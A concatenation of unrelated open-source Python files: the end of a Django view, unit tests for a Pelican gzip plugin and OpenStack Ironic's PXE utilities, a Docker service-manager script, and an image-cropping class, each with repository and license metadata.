auth.username = owner_username
auth.save()
return HttpResponse('', status=204) | civiclaboratories/planbox | src/shareabouts_integration/views.py | Python | gpl-3.0 | 8,376 |
# -*- coding: utf-8 -*-
'''Core plugins unit tests'''
import os
import tempfile
import unittest
import time
from contextlib import contextmanager
from tempfile import mkdtemp
from shutil import rmtree
from hashlib import md5
import gzip_cache
@contextmanager
def temporary_folder():
"""creates a temporary folder, return it and delete it afterwards.
This allows to do something like this in tests:
>>> with temporary_folder() as d:
# do whatever you want
"""
tempdir = mkdtemp()
try:
yield tempdir
finally:
rmtree(tempdir)
class TestGzipCache(unittest.TestCase):
def test_should_compress(self):
user_exclude_types = ()
# Some filetypes should compress and others shouldn't.
self.assertTrue(gzip_cache.should_compress('foo.html', user_exclude_types))
self.assertTrue(gzip_cache.should_compress('bar.css', user_exclude_types))
self.assertTrue(gzip_cache.should_compress('baz.js', user_exclude_types))
self.assertTrue(gzip_cache.should_compress('foo.txt', user_exclude_types))
self.assertFalse(gzip_cache.should_compress('foo.gz', user_exclude_types))
self.assertFalse(gzip_cache.should_compress('bar.png', user_exclude_types))
self.assertFalse(gzip_cache.should_compress('baz.mp3', user_exclude_types))
self.assertFalse(gzip_cache.should_compress('foo.mov', user_exclude_types))
user_exclude_types = ('.html', '.xyz')
self.assertFalse(gzip_cache.should_compress('foo.html', user_exclude_types))
self.assertFalse(gzip_cache.should_compress('bar.xyz', user_exclude_types))
self.assertFalse(gzip_cache.should_compress('foo.gz', user_exclude_types))
self.assertTrue(gzip_cache.should_compress('baz.js', user_exclude_types))
def test_should_overwrite(self):
# Default to false if GZIP_CACHE_OVERWRITE is not set
settings = { }
self.assertFalse(gzip_cache.should_overwrite(settings))
settings = { 'GZIP_CACHE_OVERWRITE': False }
self.assertFalse(gzip_cache.should_overwrite(settings))
settings = { 'GZIP_CACHE_OVERWRITE': True }
self.assertTrue(gzip_cache.should_overwrite(settings))
def test_creates_gzip_file(self):
# A file matching the input filename with a .gz extension is created.
# The plugin walks over the output content after the finalized signal
# so it is safe to assume that the file exists (otherwise walk would
# not report it). Therefore, create a dummy file to use.
with temporary_folder() as tempdir:
_, a_html_filename = tempfile.mkstemp(suffix='.html', dir=tempdir)
with open(a_html_filename, 'w') as f:
f.write('A' * 24) # under this length, compressing is useless and create_gzip_file will not create any file
gzip_cache.create_gzip_file(a_html_filename, False)
self.assertTrue(os.path.exists(a_html_filename + '.gz'))
def test_creates_same_gzip_file(self):
# Should create the same gzip file from the same contents.
# gzip will create a slightly different file because it includes
# a timestamp in the compressed file by default. This can cause
# problems for some caching strategies.
with temporary_folder() as tempdir:
_, a_html_filename = tempfile.mkstemp(suffix='.html', dir=tempdir)
with open(a_html_filename, 'w') as f:
f.write('A' * 24) # under this length, compressing is useless and create_gzip_file will not create any file
a_gz_filename = a_html_filename + '.gz'
gzip_cache.create_gzip_file(a_html_filename, False)
gzip_hash = get_md5(a_gz_filename)
time.sleep(1)
gzip_cache.create_gzip_file(a_html_filename, False)
self.assertEqual(gzip_hash, get_md5(a_gz_filename))
def test_overwrites_gzip_file(self):
# A file matching the input filename with a .gz extension is not created.
# The plugin walks over the output content after the finalized signal
# so it is safe to assume that the file exists (otherwise walk would
# not report it). Therefore, create a dummy file to use.
with temporary_folder() as tempdir:
_, a_html_filename = tempfile.mkstemp(suffix='.html', dir=tempdir)
gzip_cache.create_gzip_file(a_html_filename, True)
self.assertFalse(os.path.exists(a_html_filename + '.gz'))
def get_md5(filepath):
with open(filepath, 'rb') as fh:
return md5(fh.read()).hexdigest()
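# Added hedged illustration, separate from the tests above: gzip embeds a
# modification timestamp in its header, so compressing identical content at
# different times can yield different bytes; pinning mtime makes the output
# deterministic, which is the behaviour test_creates_same_gzip_file protects.
def _demo_deterministic_gzip(data, mtime=0):
    import gzip
    import io
    buf = io.BytesIO()
    with gzip.GzipFile(fileobj=buf, mode='wb', mtime=mtime) as gz:
        gz.write(data)
    return buf.getvalue()
assert _demo_deterministic_gzip(b'A' * 24) == _demo_deterministic_gzip(b'A' * 24)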
| mikitex70/pelican-plugins | gzip_cache/test_gzip_cache.py | Python | agpl-3.0 | 4,627 |
#
# Copyright 2014 Rackspace, Inc
# All Rights Reserved
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import os
import mock
from oslo_config import cfg
import six
from ironic.common import pxe_utils
from ironic.conductor import task_manager
from ironic.tests.conductor import utils as mgr_utils
from ironic.tests.db import base as db_base
from ironic.tests.objects import utils as object_utils
CONF = cfg.CONF
class TestPXEUtils(db_base.DbTestCase):
def setUp(self):
super(TestPXEUtils, self).setUp()
mgr_utils.mock_the_extension_manager(driver="fake")
common_pxe_options = {
'deployment_aki_path': u'/tftpboot/1be26c0b-03f2-4d2e-ae87-'
u'c02d7f33c123/deploy_kernel',
'aki_path': u'/tftpboot/1be26c0b-03f2-4d2e-ae87-c02d7f33c123/'
u'kernel',
'pxe_append_params': 'test_param',
'deployment_ari_path': u'/tftpboot/1be26c0b-03f2-4d2e-ae87-c02d7'
u'f33c123/deploy_ramdisk',
'root_device': 'vendor=fake,size=123',
'ipa-api-url': 'http://192.168.122.184:6385',
}
self.pxe_options = {
'deployment_key': '0123456789ABCDEFGHIJKLMNOPQRSTUV',
'ari_path': u'/tftpboot/1be26c0b-03f2-4d2e-ae87-c02d7f33c123/'
u'ramdisk',
'iscsi_target_iqn': u'iqn-1be26c0b-03f2-4d2e-ae87-c02d7f33'
u'c123',
'deployment_id': u'1be26c0b-03f2-4d2e-ae87-c02d7f33c123',
'ironic_api_url': 'http://192.168.122.184:6385',
'disk': 'cciss/c0d0,sda,hda,vda',
'boot_option': 'netboot',
'ipa-driver-name': 'pxe_ssh',
}
self.pxe_options.update(common_pxe_options)
self.pxe_options_bios = {
'boot_mode': 'bios',
}
self.pxe_options_bios.update(self.pxe_options)
self.pxe_options_uefi = {
'boot_mode': 'uefi',
}
self.pxe_options_uefi.update(self.pxe_options)
self.agent_pxe_options = {
'ipa-driver-name': 'agent_ipmitool',
}
self.agent_pxe_options.update(common_pxe_options)
self.ipxe_options = self.pxe_options.copy()
self.ipxe_options.update({
'deployment_aki_path': 'http://1.2.3.4:1234/deploy_kernel',
'deployment_ari_path': 'http://1.2.3.4:1234/deploy_ramdisk',
'aki_path': 'http://1.2.3.4:1234/kernel',
'ari_path': 'http://1.2.3.4:1234/ramdisk',
})
self.node = object_utils.create_test_node(self.context)
def test__build_pxe_config(self):
rendered_template = pxe_utils._build_pxe_config(
self.pxe_options_bios, CONF.pxe.pxe_config_template,
'{{ ROOT }}', '{{ DISK_IDENTIFIER }}')
expected_template = open(
'ironic/tests/drivers/pxe_config.template').read().rstrip()
self.assertEqual(six.text_type(expected_template), rendered_template)
def test__build_pxe_config_with_agent(self):
rendered_template = pxe_utils._build_pxe_config(
self.agent_pxe_options, CONF.agent.agent_pxe_config_template,
'{{ ROOT }}', '{{ DISK_IDENTIFIER }}')
expected_template = open(
'ironic/tests/drivers/agent_pxe_config.template').read().rstrip()
self.assertEqual(six.text_type(expected_template), rendered_template)
def test__build_ipxe_config(self):
# NOTE(lucasagomes): iPXE is just an extension of the PXE driver,
        # it doesn't have its own configuration option for template.
# More info:
# http://docs.openstack.org/developer/ironic/deploy/install-guide.html
self.config(
pxe_config_template='ironic/drivers/modules/ipxe_config.template',
group='pxe'
)
self.config(http_url='http://1.2.3.4:1234', group='deploy')
rendered_template = pxe_utils._build_pxe_config(
self.ipxe_options, CONF.pxe.pxe_config_template,
'{{ ROOT }}', '{{ DISK_IDENTIFIER }}')
expected_template = open(
'ironic/tests/drivers/ipxe_config.template').read().rstrip()
self.assertEqual(six.text_type(expected_template), rendered_template)
def test__build_elilo_config(self):
pxe_opts = self.pxe_options
pxe_opts['boot_mode'] = 'uefi'
rendered_template = pxe_utils._build_pxe_config(
pxe_opts, CONF.pxe.uefi_pxe_config_template,
'{{ ROOT }}', '{{ DISK_IDENTIFIER }}')
expected_template = open(
'ironic/tests/drivers/elilo_efi_pxe_config.template'
).read().rstrip()
self.assertEqual(six.text_type(expected_template), rendered_template)
def test__build_grub_config(self):
pxe_opts = self.pxe_options
pxe_opts['boot_mode'] = 'uefi'
pxe_opts['tftp_server'] = '192.0.2.1'
grub_tmplte = "ironic/drivers/modules/pxe_grub_config.template"
rendered_template = pxe_utils._build_pxe_config(
pxe_opts, grub_tmplte, '(( ROOT ))', '(( DISK_IDENTIFIER ))')
expected_template = open(
'ironic/tests/drivers/pxe_grub_config.template').read().rstrip()
self.assertEqual(six.text_type(expected_template), rendered_template)
@mock.patch('ironic.common.utils.create_link_without_raise', autospec=True)
@mock.patch('ironic.common.utils.unlink_without_raise', autospec=True)
@mock.patch('ironic.drivers.utils.get_node_mac_addresses', autospec=True)
def test__write_mac_pxe_configs(self, get_macs_mock, unlink_mock,
create_link_mock):
macs = [
'00:11:22:33:44:55:66',
'00:11:22:33:44:55:67'
]
get_macs_mock.return_value = macs
create_link_calls = [
mock.call(u'../1be26c0b-03f2-4d2e-ae87-c02d7f33c123/config',
'/tftpboot/pxelinux.cfg/01-00-11-22-33-44-55-66'),
mock.call(u'../1be26c0b-03f2-4d2e-ae87-c02d7f33c123/config',
'/tftpboot/pxelinux.cfg/01-00-11-22-33-44-55-67')
]
unlink_calls = [
mock.call('/tftpboot/pxelinux.cfg/01-00-11-22-33-44-55-66'),
mock.call('/tftpboot/pxelinux.cfg/01-00-11-22-33-44-55-67'),
]
with task_manager.acquire(self.context, self.node.uuid) as task:
pxe_utils._link_mac_pxe_configs(task)
unlink_mock.assert_has_calls(unlink_calls)
create_link_mock.assert_has_calls(create_link_calls)
@mock.patch('ironic.common.utils.create_link_without_raise', autospec=True)
@mock.patch('ironic.common.utils.unlink_without_raise', autospec=True)
@mock.patch('ironic.drivers.utils.get_node_mac_addresses', autospec=True)
def test__write_mac_ipxe_configs(self, get_macs_mock, unlink_mock,
create_link_mock):
self.config(ipxe_enabled=True, group='pxe')
macs = [
'00:11:22:33:44:55:66',
'00:11:22:33:44:55:67'
]
get_macs_mock.return_value = macs
create_link_calls = [
mock.call(u'../1be26c0b-03f2-4d2e-ae87-c02d7f33c123/config',
'/httpboot/pxelinux.cfg/00-11-22-33-44-55-66'),
mock.call(u'../1be26c0b-03f2-4d2e-ae87-c02d7f33c123/config',
'/httpboot/pxelinux.cfg/00112233445566'),
mock.call(u'../1be26c0b-03f2-4d2e-ae87-c02d7f33c123/config',
'/httpboot/pxelinux.cfg/00-11-22-33-44-55-67'),
mock.call(u'../1be26c0b-03f2-4d2e-ae87-c02d7f33c123/config',
'/httpboot/pxelinux.cfg/00112233445567'),
]
unlink_calls = [
mock.call('/httpboot/pxelinux.cfg/00-11-22-33-44-55-66'),
mock.call('/httpboot/pxelinux.cfg/00112233445566'),
mock.call('/httpboot/pxelinux.cfg/00-11-22-33-44-55-67'),
mock.call('/httpboot/pxelinux.cfg/00112233445567'),
]
with task_manager.acquire(self.context, self.node.uuid) as task:
pxe_utils._link_mac_pxe_configs(task)
unlink_mock.assert_has_calls(unlink_calls)
create_link_mock.assert_has_calls(create_link_calls)
@mock.patch('ironic.common.utils.create_link_without_raise', autospec=True)
@mock.patch('ironic.common.utils.unlink_without_raise', autospec=True)
@mock.patch('ironic.common.dhcp_factory.DHCPFactory.provider',
autospec=True)
def test__link_ip_address_pxe_configs(self, provider_mock, unlink_mock,
create_link_mock):
ip_address = '10.10.0.1'
address = "aa:aa:aa:aa:aa:aa"
object_utils.create_test_port(self.context, node_id=self.node.id,
address=address)
provider_mock.get_ip_addresses.return_value = [ip_address]
create_link_calls = [
mock.call(u'1be26c0b-03f2-4d2e-ae87-c02d7f33c123/config',
u'/tftpboot/10.10.0.1.conf'),
]
with task_manager.acquire(self.context, self.node.uuid) as task:
pxe_utils._link_ip_address_pxe_configs(task, False)
unlink_mock.assert_called_once_with('/tftpboot/10.10.0.1.conf')
create_link_mock.assert_has_calls(create_link_calls)
@mock.patch('ironic.common.utils.write_to_file', autospec=True)
@mock.patch.object(pxe_utils, '_build_pxe_config', autospec=True)
@mock.patch('oslo_utils.fileutils.ensure_tree', autospec=True)
def test_create_pxe_config(self, ensure_tree_mock, build_mock,
write_mock):
build_mock.return_value = self.pxe_options_bios
with task_manager.acquire(self.context, self.node.uuid) as task:
pxe_utils.create_pxe_config(task, self.pxe_options_bios,
CONF.pxe.pxe_config_template)
build_mock.assert_called_with(self.pxe_options_bios,
CONF.pxe.pxe_config_template,
'{{ ROOT }}',
'{{ DISK_IDENTIFIER }}')
ensure_calls = [
mock.call(os.path.join(CONF.pxe.tftp_root, self.node.uuid)),
mock.call(os.path.join(CONF.pxe.tftp_root, 'pxelinux.cfg'))
]
ensure_tree_mock.assert_has_calls(ensure_calls)
pxe_cfg_file_path = pxe_utils.get_pxe_config_file_path(self.node.uuid)
write_mock.assert_called_with(pxe_cfg_file_path, self.pxe_options_bios)
@mock.patch('ironic.common.pxe_utils._link_ip_address_pxe_configs',
autospec=True)
@mock.patch('ironic.common.utils.write_to_file', autospec=True)
@mock.patch('ironic.common.pxe_utils._build_pxe_config', autospec=True)
@mock.patch('oslo_utils.fileutils.ensure_tree', autospec=True)
def test_create_pxe_config_uefi_elilo(self, ensure_tree_mock, build_mock,
write_mock, link_ip_configs_mock):
build_mock.return_value = self.pxe_options_uefi
with task_manager.acquire(self.context, self.node.uuid) as task:
task.node.properties['capabilities'] = 'boot_mode:uefi'
pxe_utils.create_pxe_config(task, self.pxe_options_uefi,
CONF.pxe.uefi_pxe_config_template)
ensure_calls = [
mock.call(os.path.join(CONF.pxe.tftp_root, self.node.uuid)),
mock.call(os.path.join(CONF.pxe.tftp_root, 'pxelinux.cfg'))
]
ensure_tree_mock.assert_has_calls(ensure_calls)
build_mock.assert_called_with(self.pxe_options_uefi,
CONF.pxe.uefi_pxe_config_template,
'{{ ROOT }}',
'{{ DISK_IDENTIFIER }}')
link_ip_configs_mock.assert_called_once_with(task, True)
pxe_cfg_file_path = pxe_utils.get_pxe_config_file_path(self.node.uuid)
write_mock.assert_called_with(pxe_cfg_file_path, self.pxe_options_uefi)
@mock.patch('ironic.common.pxe_utils._link_ip_address_pxe_configs',
autospec=True)
@mock.patch('ironic.common.utils.write_to_file', autospec=True)
@mock.patch('ironic.common.pxe_utils._build_pxe_config', autospec=True)
@mock.patch('oslo_utils.fileutils.ensure_tree', autospec=True)
def test_create_pxe_config_uefi_grub(self, ensure_tree_mock, build_mock,
write_mock, link_ip_configs_mock):
build_mock.return_value = self.pxe_options_uefi
grub_tmplte = "ironic/drivers/modules/pxe_grub_config.template"
with task_manager.acquire(self.context, self.node.uuid) as task:
task.node.properties['capabilities'] = 'boot_mode:uefi'
pxe_utils.create_pxe_config(task, self.pxe_options_uefi,
grub_tmplte)
ensure_calls = [
mock.call(os.path.join(CONF.pxe.tftp_root, self.node.uuid)),
mock.call(os.path.join(CONF.pxe.tftp_root, 'pxelinux.cfg'))
]
ensure_tree_mock.assert_has_calls(ensure_calls)
build_mock.assert_called_with(self.pxe_options_uefi,
grub_tmplte,
'(( ROOT ))',
'(( DISK_IDENTIFIER ))')
link_ip_configs_mock.assert_called_once_with(task, False)
pxe_cfg_file_path = pxe_utils.get_pxe_config_file_path(self.node.uuid)
write_mock.assert_called_with(pxe_cfg_file_path, self.pxe_options_uefi)
@mock.patch('ironic.common.utils.rmtree_without_raise', autospec=True)
@mock.patch('ironic.common.utils.unlink_without_raise', autospec=True)
def test_clean_up_pxe_config(self, unlink_mock, rmtree_mock):
address = "aa:aa:aa:aa:aa:aa"
object_utils.create_test_port(self.context, node_id=self.node.id,
address=address)
with task_manager.acquire(self.context, self.node.uuid) as task:
pxe_utils.clean_up_pxe_config(task)
unlink_mock.assert_called_once_with("/tftpboot/pxelinux.cfg/01-%s"
% address.replace(':', '-'))
rmtree_mock.assert_called_once_with(
os.path.join(CONF.pxe.tftp_root, self.node.uuid))
def test__get_pxe_mac_path(self):
mac = '00:11:22:33:44:55:66'
self.assertEqual('/tftpboot/pxelinux.cfg/01-00-11-22-33-44-55-66',
pxe_utils._get_pxe_mac_path(mac))
def test__get_pxe_mac_path_ipxe(self):
self.config(ipxe_enabled=True, group='pxe')
self.config(http_root='/httpboot', group='deploy')
mac = '00:11:22:33:AA:BB:CC'
self.assertEqual('/httpboot/pxelinux.cfg/00-11-22-33-aa-bb-cc',
pxe_utils._get_pxe_mac_path(mac))
def test__get_pxe_ip_address_path(self):
ipaddress = '10.10.0.1'
self.assertEqual('/tftpboot/10.10.0.1.conf',
pxe_utils._get_pxe_ip_address_path(ipaddress, False))
def test_get_root_dir(self):
expected_dir = '/tftproot'
self.config(ipxe_enabled=False, group='pxe')
self.config(tftp_root=expected_dir, group='pxe')
self.assertEqual(expected_dir, pxe_utils.get_root_dir())
def test_get_root_dir_ipxe(self):
expected_dir = '/httpboot'
self.config(ipxe_enabled=True, group='pxe')
self.config(http_root=expected_dir, group='deploy')
self.assertEqual(expected_dir, pxe_utils.get_root_dir())
def test_get_pxe_config_file_path(self):
self.assertEqual(os.path.join(CONF.pxe.tftp_root,
self.node.uuid,
'config'),
pxe_utils.get_pxe_config_file_path(self.node.uuid))
def test_dhcp_options_for_instance(self):
self.config(tftp_server='192.0.2.1', group='pxe')
self.config(pxe_bootfile_name='fake-bootfile', group='pxe')
expected_info = [{'opt_name': 'bootfile-name',
'opt_value': 'fake-bootfile'},
{'opt_name': 'server-ip-address',
'opt_value': '192.0.2.1'},
{'opt_name': 'tftp-server',
'opt_value': '192.0.2.1'}
]
with task_manager.acquire(self.context, self.node.uuid) as task:
self.assertEqual(expected_info,
pxe_utils.dhcp_options_for_instance(task))
def _test_get_deploy_kr_info(self, expected_dir):
node_uuid = 'fake-node'
driver_info = {
'deploy_kernel': 'glance://deploy-kernel',
'deploy_ramdisk': 'glance://deploy-ramdisk',
}
expected = {
'deploy_kernel': ('glance://deploy-kernel',
expected_dir + '/fake-node/deploy_kernel'),
'deploy_ramdisk': ('glance://deploy-ramdisk',
expected_dir + '/fake-node/deploy_ramdisk'),
}
kr_info = pxe_utils.get_deploy_kr_info(node_uuid, driver_info)
self.assertEqual(expected, kr_info)
def test_get_deploy_kr_info(self):
expected_dir = '/tftp'
self.config(tftp_root=expected_dir, group='pxe')
self._test_get_deploy_kr_info(expected_dir)
def test_get_deploy_kr_info_ipxe(self):
expected_dir = '/http'
self.config(ipxe_enabled=True, group='pxe')
self.config(http_root=expected_dir, group='deploy')
self._test_get_deploy_kr_info(expected_dir)
def test_get_deploy_kr_info_bad_driver_info(self):
self.config(tftp_root='/tftp', group='pxe')
node_uuid = 'fake-node'
driver_info = {}
self.assertRaises(KeyError,
pxe_utils.get_deploy_kr_info,
node_uuid,
driver_info)
def test_dhcp_options_for_instance_ipxe(self):
self.config(tftp_server='192.0.2.1', group='pxe')
self.config(pxe_bootfile_name='fake-bootfile', group='pxe')
self.config(ipxe_enabled=True, group='pxe')
self.config(http_url='http://192.0.3.2:1234', group='deploy')
self.config(ipxe_boot_script='/test/boot.ipxe', group='pxe')
self.config(dhcp_provider='isc', group='dhcp')
expected_boot_script_url = 'http://192.0.3.2:1234/boot.ipxe'
expected_info = [{'opt_name': '!175,bootfile-name',
'opt_value': 'fake-bootfile'},
{'opt_name': 'server-ip-address',
'opt_value': '192.0.2.1'},
{'opt_name': 'tftp-server',
'opt_value': '192.0.2.1'},
{'opt_name': 'bootfile-name',
'opt_value': expected_boot_script_url}]
with task_manager.acquire(self.context, self.node.uuid) as task:
self.assertItemsEqual(expected_info,
pxe_utils.dhcp_options_for_instance(task))
self.config(dhcp_provider='neutron', group='dhcp')
expected_boot_script_url = 'http://192.0.3.2:1234/boot.ipxe'
expected_info = [{'opt_name': 'tag:!ipxe,bootfile-name',
'opt_value': 'fake-bootfile'},
{'opt_name': 'server-ip-address',
'opt_value': '192.0.2.1'},
{'opt_name': 'tftp-server',
'opt_value': '192.0.2.1'},
{'opt_name': 'tag:ipxe,bootfile-name',
'opt_value': expected_boot_script_url}]
with task_manager.acquire(self.context, self.node.uuid) as task:
self.assertItemsEqual(expected_info,
pxe_utils.dhcp_options_for_instance(task))
@mock.patch('ironic.common.utils.rmtree_without_raise', autospec=True)
@mock.patch('ironic.common.utils.unlink_without_raise', autospec=True)
@mock.patch('ironic.common.dhcp_factory.DHCPFactory.provider')
def test_clean_up_pxe_config_uefi(self, provider_mock, unlink_mock,
rmtree_mock):
ip_address = '10.10.0.1'
address = "aa:aa:aa:aa:aa:aa"
properties = {'capabilities': 'boot_mode:uefi'}
object_utils.create_test_port(self.context, node_id=self.node.id,
address=address)
provider_mock.get_ip_addresses.return_value = [ip_address]
with task_manager.acquire(self.context, self.node.uuid) as task:
task.node.properties = properties
pxe_utils.clean_up_pxe_config(task)
unlink_calls = [
mock.call('/tftpboot/10.10.0.1.conf'),
mock.call('/tftpboot/0A0A0001.conf')
]
unlink_mock.assert_has_calls(unlink_calls)
rmtree_mock.assert_called_once_with(
os.path.join(CONF.pxe.tftp_root, self.node.uuid))
@mock.patch('ironic.common.utils.rmtree_without_raise')
@mock.patch('ironic.common.utils.unlink_without_raise')
@mock.patch('ironic.common.dhcp_factory.DHCPFactory.provider')
def test_clean_up_pxe_config_uefi_instance_info(self,
provider_mock, unlink_mock,
rmtree_mock):
ip_address = '10.10.0.1'
address = "aa:aa:aa:aa:aa:aa"
object_utils.create_test_port(self.context, node_id=self.node.id,
address=address)
provider_mock.get_ip_addresses.return_value = [ip_address]
with task_manager.acquire(self.context, self.node.uuid) as task:
task.node.instance_info['deploy_boot_mode'] = 'uefi'
pxe_utils.clean_up_pxe_config(task)
unlink_calls = [
mock.call('/tftpboot/10.10.0.1.conf'),
mock.call('/tftpboot/0A0A0001.conf')
]
unlink_mock.assert_has_calls(unlink_calls)
rmtree_mock.assert_called_once_with(
os.path.join(CONF.pxe.tftp_root, self.node.uuid))
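# Added illustration, independent of the Ironic code under test: the filename
# asserted in test__get_pxe_mac_path is the conventional PXELinux form -- the
# MAC address lower-cased, ':' replaced by '-', behind the "01-" hardware-type
# prefix.
def _demo_pxelinux_mac_filename(mac):
    return '01-' + mac.replace(':', '-').lower()
assert _demo_pxelinux_mac_filename('00:11:22:33:44:55:66') == '01-00-11-22-33-44-55-66'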
| redhat-openstack/ironic | ironic/tests/common/test_pxe_utils.py | Python | apache-2.0 | 22,973 |
#!/usr/bin/python
# -*- coding:utf-8 -*-
#############################################
# Flask & werkzeug HTTP Proxy Sample code.
# - Code by Jioh L. Jung (ziozzang@gmail.com)
#############################################
import ConfigParser
import os
import docker
from docker.utils import kwargs_from_env
import time
import sys
STARTED='started'
STOPPED='stopped'
STATUS='status'
class kbservices:
PREFIX='proxy_'
CONFIGFILE='cluster.ini'
DEFAULTIMAGE='canon/fakeserv:1.0'
RETRY=40
POLL_TIME=0.1
def __init__(self):
self.services=self.read_config()
self.client=self.init_docker()
self.update_services()
def get_item(self,section,item,default):
value=default
if self.Config.has_option('defaults',item):
value=self.Config.get('defaults',item)
if self.Config.has_option(section,item):
value=self.Config.get(section,item)
return value
def read_config(self):
services=dict()
self.Config = ConfigParser.ConfigParser()
self.Config.default_section='defaults'
self.Config.read(self.CONFIGFILE)
for section in self.Config.sections():
if section=='global':
continue
if section=='defaults':
continue
type=self.get_item(section,'type','service')
if type!='service':
continue
pt=self.get_item(section,'proxytype','proxy')
# TODO: figure out how to manage these too
if section in ['www','mongo','mysql']:
continue
# TODO: figure out the best way to do this.
# For now, allow everything
#if pt=='skip':
# continue
service=self.get_item(section,'urlname',section)
services[service]=dict()
services[service][STATUS]=STOPPED
services[service]['ip']=''
services[service]['port']=0
services[service]['service-port']=int(self.get_item(section,'service-port',0))
services[service]['image']=self.get_item(section,'docker-image',self.DEFAULTIMAGE)
volumes=[]
binds=dict()
for item in self.get_item(section,'docker-volumes','').split(','):
if item!='':
(volume,alias)=item.split(':')
volumes.append(alias)
binds[volume]=dict(bind=alias,mode='rw')
services[service]['volumes']=volumes
services[service]['binds']=binds
links=dict()
for item in self.get_item(section,'docker-links','').split(','):
if item!='':
(link,alias)=item.split(':')
links[link]=alias
services[service]['links']=links
services[service]['section']=section
services[service]['name']=service
services[service]['container']=''
return services
def init_docker(self):
if 'DOCKER_HOST' in os.environ:
self.IP=os.environ['DOCKER_HOST'].replace('tcp://','').split(':')[0]
else:
self.IP=''
kwargs = kwargs_from_env()
if 'tls' in kwargs:
kwargs['tls'].assert_hostname = False
client = docker.Client(**kwargs)
return client
def isaservice(self,service):
if service in self.services:
return True
else:
return False
def isstarted(self,service):
if service in self.services and self.services[service][STATUS]==STARTED:
return True
else:
return False
def get_list(self):
return self.services.keys()
def get_hostport(self,service):
if service in self.services:
sr=self.services[service]
if sr[STATUS]==STOPPED:
if not self.start_service(service):
return (None,None)
return (sr['ip'],sr['port'])
else:
return (None,None)
def update_service(self,service,id):
self.services[service]['container']=id
ct=self.client.inspect_container(id)
if ct['State']['Running']==False:
self.client.remove_container(id)
self.services[service][STATUS]=STOPPED
return self.services[service][STATUS]
if self.IP == '':
self.services[service]['ip']=ct['NetworkSettings']['IPAddress']
self.services[service]['port']=self.services[service]['service-port']
else:
self.services[service]['ip']=self.IP
self.services[service]['port']=self.services[service]['service-port']
self.services[service][STATUS]=STARTED
return self.services[service][STATUS]
def update_services(self):
for cont in self.client.containers(all=True):
if 'Names' in cont and cont['Names'] is not None:
for name in cont['Names']:
service=name.replace('/'+self.PREFIX,'')
if service in self.services:
self.update_service(service,cont['Id'])
def start_service(self,service):
self.update_services()
if service not in self.services:
return False
sr=self.services[service]
if sr[STATUS]==STARTED:
return True
image=sr['image']
port=sr['service-port']
host_config=docker.utils.create_host_config(port_bindings={port:port},
links=sr['links'],
binds=sr['binds'])
try:
container = self.client.create_container( image=image,
name=self.PREFIX+sr['name'],
detach=True,
ports=[port],
volumes=sr['volumes'],
environment=dict(PORT=port,MYSERVICES=sr['section']),
host_config=host_config)
except:
print "Unexpected error creating container:", sys.exc_info()[0]
raise
id=container.get('Id')
try:
response = self.client.start(container=id)
except:
print "Unexpected error starting container:", sys.exc_info()[0]
raise
retry=self.RETRY
while retry>0:
retry-=1
self.update_service(service,id)
if sr[STATUS]==STARTED:
return True
            time.sleep(self.POLL_TIME)
return False
def kill_service(self,service):
self.update_services()
if service in self.services:
sr=self.services[service]
id=sr['container']
if sr[STATUS]!=STOPPED:
self.client.kill(id)
retry=self.RETRY
while retry>0:
retry-=1
self.update_service(service,id)
if sr[STATUS]==STOPPED:
return True
time.sleep(self.POLL_TIME)
return False
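# Added standalone sketch: the "docker-volumes" option consumed by read_config
# above is a comma-separated list of host_path:container_path pairs; this
# helper mirrors that parsing so the bind format handed to docker-py is easy to
# see. The paths are illustrative.
def _demo_parse_volumes(spec):
    volumes, binds = [], {}
    for item in spec.split(','):
        if item != '':
            volume, alias = item.split(':')
            volumes.append(alias)
            binds[volume] = dict(bind=alias, mode='rw')
    return volumes, binds
assert _demo_parse_volumes('/data/mongo:/data/db') == (
    ['/data/db'], {'/data/mongo': {'bind': '/data/db', 'mode': 'rw'}})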
if __name__ == '__main__':
kbs=kbservices()
if len(sys.argv)==3 and sys.argv[1]=='start':
service=sys.argv[2]
print "Starting "+service
kbs.start_service(service)
elif len(sys.argv)==3 and sys.argv[1]=='stop':
service=sys.argv[2]
print "Stop "+service
if service=='all':
for s in kbs.get_list():
kbs.kill_service(s)
else:
kbs.kill_service(service)
elif len(sys.argv)==3 and sys.argv[1]=='restart':
service=sys.argv[2]
print "Restart "+service
kbs.kill_service(service)
kbs.start_service(service)
elif len(sys.argv)==2 and sys.argv[1]=='status':
print
print '%-30s %5s %-25s'%('Service','Status','Host:Port')
print '==========================================================='
for s in sorted(kbs.get_list()):
status=kbs.isstarted(s)
hp=''
if status==True:
(h,p)=kbs.get_hostport(s)
if (h,p) != (None,None):
hp='%s:%d'%(h,p)
print '%-30s %5s %-25s'%(s,status,hp)
else:
print "Usage: kbservices <start,stop,stautus> [service]"
| kbaseIncubator/kbrouter | kbservices.py | Python | mit | 7,353 |
import base64
from io import BytesIO
import os
from PIL import Image
class ImageProcessor:
def __init__(self,request):
img64 = request.POST.get('imgUrl')
img64 = img64[img64.find(',')+1:]
self.img = Image.open(BytesIO(base64.b64decode(img64)))
self.initDim = (int(request.POST.get('imgInitW')), int(request.POST.get('imgInitH')))
self.scaleDim = (int(float(request.POST.get('imgW'))), int(float(request.POST.get('imgH'))))
self.cropDim = (int(float(request.POST.get('cropW'))), int(float(request.POST.get('cropH'))))
self.corner = (int(float(request.POST.get('imgX1'))), int(float(request.POST.get('imgY1'))))
self.rotation = request.POST.get("rotation")
if '-' in request.POST.get("rotation"):
self.angle = int(request.POST.get("rotation")[1:])
else:
            self.angle = 360 - int(request.POST.get("rotation"))  # rotation in PIL is counter-clockwise
def CropImage(self):
self.img = self.img.resize(self.scaleDim, Image.LANCZOS)
self.img = self.img.rotate(self.angle)
self.img = self.img.crop((self.corner[0], self.corner[1] , self.cropDim[0] + self.corner[0], self.cropDim[1] + self.corner[1]))
def SaveImage(self, filename):
full_path = os.path.join("/var/www/html/ShotForTheHeart/media/", filename)
try:
self.img.save(full_path)
return True
except:
return False
def LoadImage(self, path):
filename = "/var/www/html/ShotForTheHeart/" + path
return base64.b64encode(open(filename,"rb").read())
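# Added hedged note: ImageProcessor converts the clockwise rotation sent by the
# cropping widget into PIL's counter-clockwise convention. A standalone check
# of that arithmetic, with illustrative values:
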